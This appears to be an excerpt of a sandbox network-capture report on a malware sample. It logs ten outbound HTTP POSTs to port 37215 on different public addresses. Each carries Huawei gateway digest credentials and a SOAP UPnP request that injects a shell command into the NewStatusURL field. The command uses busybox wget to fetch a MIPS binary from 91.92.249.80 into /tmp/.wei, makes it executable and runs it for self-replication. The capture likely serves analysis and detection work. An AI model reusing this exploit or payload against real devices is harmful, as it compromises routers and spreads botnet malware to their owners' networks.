                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          510192.168.2.2356398197.67.70.15737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195565939 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          511192.168.2.234191841.218.148.13037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195568085 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          512192.168.2.2339508157.151.240.3437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195595026 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          513192.168.2.2351754197.146.155.2637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195597887 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          514192.168.2.2345118157.224.221.23237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195668936 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          515192.168.2.2354900197.36.43.1237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195689917 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          516192.168.2.2356776197.61.90.8237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195693016 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          517192.168.2.2344936157.18.6.3837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195720911 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          518192.168.2.2335420157.121.7.5937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195735931 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          519192.168.2.2359580159.91.3.23837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195755959 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
